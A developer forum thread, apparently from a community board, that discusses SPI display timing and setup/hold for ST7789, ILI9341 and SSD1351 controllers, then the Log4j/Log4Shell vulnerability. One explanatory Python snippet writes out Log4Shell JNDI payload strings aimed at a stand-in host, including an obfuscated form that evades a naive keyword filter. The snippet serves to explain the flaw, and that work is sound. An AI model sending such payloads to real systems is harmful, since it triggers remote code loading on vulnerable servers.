|
The problem with that is simply effort. Basically I'd need to know the timings for absolutely everything. It would take me months to write code that should take me days. I think I'll pass.
Real programmers use butterflies
|
That is overly pessimistic. Systems get designed without knowing "everything". What you do need is a basic approach to the setup-and-hold issue, so you need to make sure that:
A) data transfers don't overlap
B) each data transfer consists of three phases:
1. set the data ready
2. issue the clock/latch pulse
3. remove the data (i.e. guarantee the hold spec)
These steps must remain in sequence, with non-zero time between them. As electronic setup and hold requirements are in the (tens of) nanoseconds range, having one or a few instructions in between normally suffices. How you get that depends on your environment and available tooling.
If a general purpose driver is present, consider using three separate I/O operations. If a specialized driver is used, it should take care of the details itself.
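The three phases above can be sketched as follows. This is a minimal illustration only: the `Pin` class simulates a GPIO line, and `latch_byte` and the timing constants are invented for the sketch, not any real driver API.

```python
import time

# Hypothetical pin-level interface; a real MCU driver would write registers.
class Pin:
    def __init__(self):
        self.level = 0
        self.history = []          # (timestamp_ns, level) trace for inspection
    def write(self, level):
        self.level = level
        self.history.append((time.monotonic_ns(), level))

def latch_byte(data_pins, clock_pin, value, t_setup_ns=50, t_hold_ns=50):
    """Three-phase transfer: set data, pulse the clock, then release the data.

    The sleeps guarantee non-zero setup and hold time; on a real MCU a few
    instructions between the writes is usually enough.
    """
    # Phase 1: set the data ready
    for i, pin in enumerate(data_pins):
        pin.write((value >> i) & 1)
    time.sleep(t_setup_ns / 1e9)       # setup time before the clock edge
    # Phase 2: issue the clock/latch pulse
    clock_pin.write(1)
    clock_pin.write(0)
    time.sleep(t_hold_ns / 1e9)        # hold time after the clock edge
    # Phase 3: remove the data (lines may now change without violating hold)
    for pin in data_pins:
        pin.write(0)

data = [Pin() for _ in range(8)]
clk = Pin()
latch_byte(data, clk, 0xA5)
```

Because the phases never overlap, the data lines are stable both before and after the clock edge, which is all the setup-and-hold spec really asks for.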
Once you get a solution, use it everywhere. Separation of concerns applies at all levels.
PS: Beware of optimizing compilers; low-level code is best collected in a separate file that gets handled with other tools or tool settings.
Luc Pattyn [My Articles]
The Windows 11 "taskbar" is disgusting. It should be at the left of the screen, with real icons, with text, progress, etc. They downgraded my developer PC to a bloody iPhone.
|
This is all an excellent argument for using my logic analyzer.
Real programmers use butterflies
|
That does not make any sense to me; it sounds like using a debugger when code does not even compile.
BTW: a logic analyzer also has setup and hold requirements!
Luc Pattyn [My Articles]
|
Okay.
I don't time the SPI in software. It is timed by a controller on the MCU I'm using.
No compiler in the world is going to tell me what that hardware is producing.
A logic analyzer will.
So if I want to make sure the signals don't overlap, I'm looking at the bus output using my Saleae. Full stop.
Real programmers use butterflies
|
Displays have their own requirements, no matter what bus or interface is being used. Their functionality is typically microcontroller-based, and simple commands take a few microseconds to process; more complex commands (total reset, return home, row clear, ...) may run into a few milliseconds. Obviously you have to take care of that; SPI or any other interface won't do it for you.
If you want to debug that with an LA, be my guest. My first approach would be to add some code to either check things in software (assert a minimum timespan between commands) or generate a log file; yes, I'm aware this by itself may change the timing a bit, but it can tell me where things are insufficient or marginal.
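A minimal sketch of the software-check idea: the `CommandPacer` helper and its gap figure are invented for illustration; real minimum gaps come from the display's datasheet (microseconds for simple commands, milliseconds for resets).

```python
import time

class CommandPacer:
    """Software check of the minimum timespan between display commands.

    Records violations in a list rather than crashing, so marginal or
    insufficient timing shows up without changing behaviour much.
    """
    def __init__(self, min_gap_s):
        self.min_gap_s = min_gap_s
        self.last = None
        self.violations = []               # (command, actual_gap) log

    def before_command(self, name):
        now = time.monotonic()
        if self.last is not None:
            gap = now - self.last
            if gap < self.min_gap_s:
                self.violations.append((name, gap))
        self.last = now

# Absurdly large gap (10 s) just to demonstrate that the check fires;
# a real display would need something in the microsecond range.
pacer = CommandPacer(min_gap_s=10.0)
pacer.before_command("CASET")
pacer.before_command("RASET")              # issued far too soon: logged
```

Inspecting `pacer.violations` afterwards tells you which commands were issued too close together and by how much.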
Luc Pattyn [My Articles]
|
Luc Pattyn wrote: My first approach would be to add some code to either check things by software (assert minimum timespan between commands)
And which display model and chip should I start with, since the same exact thing (including exactly how it fails) happens on literally all of them: ST7789, ILI9341, and SSD1351 alike.
So which datasheet do I start with? Since they all fail exactly the same way?
Real programmers use butterflies
|
If you want all of them to work properly, it does not really matter; you would have to solve all the problems anyway. But then the ST7789S and ILI9341 look very similar, while the SSD1351 is clearly different.
Assuming nothing else is a factor (e.g. all the hardware looks equally reliable), I would start with the ST7789S or ILI9341, whichever you can get the most recent datasheet for. Or the most intelligible one, as not all Asian-to-English translations are equally successful.
Luc Pattyn [My Articles]
|
Since you're asking for opinion: You seem to be a very creative person, so I'm guessing that you have ideas bubbling away on the back burner of your mind all the time. Back burner this one. Let it rest from up-front work while you work on other projects, and the answer might just hit you along the way.
|
1. Optimised code that does not work is not optimised code... it's broken code.
2. Get on and fix it - use a good LA to look at the timing and data-value differences on the bus between when it works and when it doesn't.
3. Do not release known broken code.
4. Consider people asking to use DMA...
|
I don't like it when people are pedantic. You know what I mean in #1.
The DMA is actually the only part that's working consistently.
Real programmers use butterflies
|
Yes, I do know what you mean. But the point is that consumers of your library will not know (or really care?) about the history of the code; they just want to use code that works and is good quality. If you change the wording and ask whether consumers would like un-optimised code or broken code, neither sounds all that appealing.
|
As I said in my OP, though maybe I wasn't clear, I wouldn't be releasing code that didn't work. I'd simply dial back the optimizations until they weren't there anymore, leaving it functioning the same way as the existing released code (at least for SPI).
I should add, I've already decided not to release it, so this exchange is moot outside of the hypothetical. Just FYI.
Real programmers use butterflies
|
I see
|
It's been a couple of years since I last wrote an SPI -> display setup, but if I'm remembering correctly there is a minimum time threshold for the slave device to register the tick.
Usually the PDF for the display chip should have the min and max values. But I'm likely saying something you already know.
Have you tried putting in some empty wait commands between processing to slow it down a few cycles and see if the displays that aren't working correctly start working again? If they do, can you make a couple of variables when initializing the code, like _DSP_FAST = 0, _DSP_MED = 16, _DSP_SLOW = 32, and tie those into wait loops?
On the whether-to-release-it question: I wouldn't, unless there is a clear advantage to your optimized code, like a solid 10% gain (or more) in clock ticks that can be shed over to other processing tasks; but then you should have a disclaimer for which displays work well and which ones you know don't.
Gosh, I miss working on that stuff.
Good luck in whatever direction you are going.
|
Does anyone actually use Log4j? I mean, it's like... 1999 stuff? I thought there were other diagnostic APIs and services. The so-called article writers, who get paid to write doom to pay their rent, say that "The Log4j Vulnerability Will Haunt the Internet for Years"... It's like "The covid pandemic will haunt the world for years"... damn...
Caveat Emptor.
"Progress doesn't come from early risers – progress is made by lazy men looking for easier ways to do things." Lazarus Long
|
When I heard about it a bit over a week ago, I scanned all my file systems. The only bits that came close were some historical backups of long-dead machines.
The first attempted exploit in my server logs was at 2021-12-11 00:28Z.
Since then the "villains" are using all sorts of cute encoding tricks to get jndi past dumb filters that look for it in plain text.
They currently account for around 7 or 8% of the noise traffic (i.e. by IP address, not hostname).
And yes, I think there is a considerable "beat-up" component. Apart from Minecraft, I haven't heard of any significant exploits.
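To illustrate why plain-text filters miss those encoding tricks: Log4j's nested lookups (e.g. the real `${lower:...}` lookup) only reassemble the string when Log4j itself evaluates them, so a literal scan never sees "jndi". The filter below is deliberately naive, for illustration.

```python
def naive_filter(line):
    """A 'dumb filter' that only blocks the literal, plain-text form."""
    return "jndi" not in line.lower()

# The straightforward payload is caught...
plain = "${jndi:ldap://evil.example/a}"
# ...but a nested-lookup form (a real trick seen in the wild) never
# contains the literal string "jndi" until Log4j evaluates it:
obfuscated = "${${lower:j}ndi:ldap://evil.example/a}"

assert naive_filter(plain) is False        # blocked
assert naive_filter(obfuscated) is True    # slips straight through
```

Which is why patching the library beats trying to filter the traffic.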
Software rusts. Simon Stephenson, ca 1994. So does this signature. me, 2012
|
Did a scan on my machine. IntelliJ Idea uses it.
|
Where I work (a Windows shop) we only have two candidates, TeamCity and Jira, and neither was affected.
|
Well, plenty of 1999 stuff is still running in production in plenty of places... why change something that is working, hey?!
AS/400 and COBOL are much older and still widely in use!
modified 18-Dec-21 5:13am.
|
I have a Linux Jenkins build server, and whilst the Jenkins core doesn't use log4j, the Groovy scripting language does, and possibly some plugins do.
"Life should not be a journey to the grave with the intention of arriving safely in a pretty and well-preserved body, but rather to skid in broadside in a cloud of smoke, thoroughly used up, totally worn out, and loudly proclaiming “Wow! What a Ride!" - Hunter S Thompson - RIP
|
Another reason not to blindly jump on any "new" framework, just because it's "new".
BTW, my team is full of programming gods, and we don't do logging. At all.
".45 ACP - because shooting twice is just silly" - JSOP, 2010 ----- You can never have too much ammo - unless you're swimming, or on fire. - JSOP, 2010 ----- When you pry the gun from my cold dead hands, be careful - the barrel will be very hot. - JSOP, 2013
|
Programming gods wouldn't use a third-party logging library anyway; if needed, they'd roll their own.
|
I don't understand it...
A logging library should simply log messages, right?
How can a logging library become vulnerable? I think only if it takes actions for specific messages. And that is not the job of a logging tool.
[Edit]
Good explanation I found here: All About Log4j Log4Shell 0-Day Vulnerability - CVE-2021-44228[^]
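That intuition is exactly right, and a toy version makes it concrete: the vulnerability exists because Log4j evaluates `${...}` lookups found inside message text. The `expand_lookups` function below is an invented simplification of that mechanism, not Log4j's actual code.

```python
import re

def expand_lookups(message, resolvers):
    """Toy version of 'taking actions for specific messages': replace
    ${name:arg} patterns via a resolver table, like Log4j's lookups."""
    def repl(match):
        name, arg = match.group(1), match.group(2)
        resolver = resolvers.get(name)
        return resolver(arg) if resolver else match.group(0)
    return re.sub(r"\$\{(\w+):([^}]*)\}", repl, message)

# The moment a resolver does something powerful (Log4j's jndi lookup
# fetched and instantiated remote classes), attacker-controlled log
# text becomes attacker-controlled behaviour.
resolvers = {"env": lambda key: f"<value of {key}>"}
logged = expand_lookups("user-agent: ${env:SECRET_TOKEN}", resolvers)
```

A library that treated messages as opaque strings would have nothing to exploit; the danger comes entirely from interpreting their content.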
modified 18-Dec-21 7:02am.
|